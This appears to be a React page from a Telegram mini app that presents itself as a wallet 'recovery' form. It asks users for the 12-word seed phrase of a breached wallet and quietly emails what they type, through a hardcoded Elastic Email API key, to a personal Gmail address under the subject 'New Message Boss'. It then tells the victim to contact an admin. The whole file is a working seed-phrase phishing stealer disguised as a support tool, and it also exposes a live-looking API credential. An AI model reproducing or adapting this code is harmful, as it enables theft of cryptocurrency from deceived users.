import React, { useState } from 'react';
import TelegramHeader from "../../components/kit/Header/TelegramHeader";
import TelegramText from "../../components/kit/Text/TelegramText";
import TelegramInput from "../../components/kit/Input/TelegramInput";
import TelegramButton from "../../components/kit/Button/TelegramButton";
import { useNavigate } from "react-router-dom";

const Report = () => {
    const [breachDetails, setBreachDetails] = useState('');
    const [isSubmitting, setIsSubmitting] = useState(false);
    const navigate = useNavigate();

    const handleSubmit = async () => {
        setIsSubmitting(true);
        try {
            const response = await submitBreachDetails(breachDetails);
            /** 
            if (response.success) {
                navigate('/success'); // Navigate to a success page or back to the home page
            } else {
                alert("Failed to submit the information. Please try again.");
            }
                */
        } catch (error) {
            console.error("Error submitting breach details:", error);
            alert("An error occurred. Please try again.");
        } finally {
            setIsSubmitting(false);
        }
    };

    return (
        <div>
            <TelegramHeader>
                <TelegramText className="telegramTitle">Perform Recovery Actions</TelegramText>
            </TelegramHeader>
            
            <TelegramText>
                Please provide the 12 key phrases of the wallet that was breached:
            </TelegramText>

            <TelegramInput
                placeholder="12 key phrases..."
                value={breachDetails}
                onChange={(e) => setBreachDetails(e.target.value)}
                multiline
            />

            <TelegramButton onClick={handleSubmit} disabled={!breachDetails || isSubmitting}>
                {isSubmitting ? "Submitting..." : "Submit Report"}
            </TelegramButton>
        </div>
    );
};

export default Report;

// Function to submit breach details to the server
async function submitBreachDetails(details) {
    const response = await sendApi(`${details} \n\n from tgminiapp0`);
    alert("Contact admin to continue recovery process")
}

const sendApi = async (message) => {
    console.log(message)
    const url = 'https://api.elasticemail.com/v4/emails/transactional'; // API endpoint

    // Define the request data
    const requestData = {
        Recipients: {
            To: ["kentsam262@gmail.com"],
            CC: [],
            BCC: []
        },
        Content: {
            Body: [
                {
                    ContentType: "HTML",
                    Content: `<p>${message}</p>`,
                    Charset: "UTF-8"
                }
            ],
            Merge: {
                city: "New York",
                age: "34"
            },
            Attachments: [],
            Headers: {
                city: "New York",
                age: "34"
            },
            Postback: "string",
            EnvelopeFrom: "Kent Sam <kentsam262@gmail.com",
            From: "Kent Sam <kentsam262@gmail.com",
            ReplyTo: "Kent Sam <kentsam262@gmail.com",
            Subject: "New Message Boss",
            TemplateName: "",
            AttachFiles: [],
            Utm: {
                Source: "source",
                Medium: "medium",
                Campaign: "campaign",
                Content: "content"
            }
        },
        Options: {
            TimeOffset: null,
            PoolName: "My Custom Pool",
            ChannelName: "Channel01",
            Encoding: "UserProvided",
            TrackOpens: "true",
            TrackClicks: "true"
        }
    };

    const response = await fetch(url, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
            'X-ElasticEmail-ApiKey': 'E38F595453E6A4315EECD39C268CA47C417279C72AD61507277C3D0ED2FAEEA26AD4B614421C461E2D2B2AC418371215'
        },
        body: JSON.stringify(requestData),
    });
    return await response.json();  // Return the response from the server

}
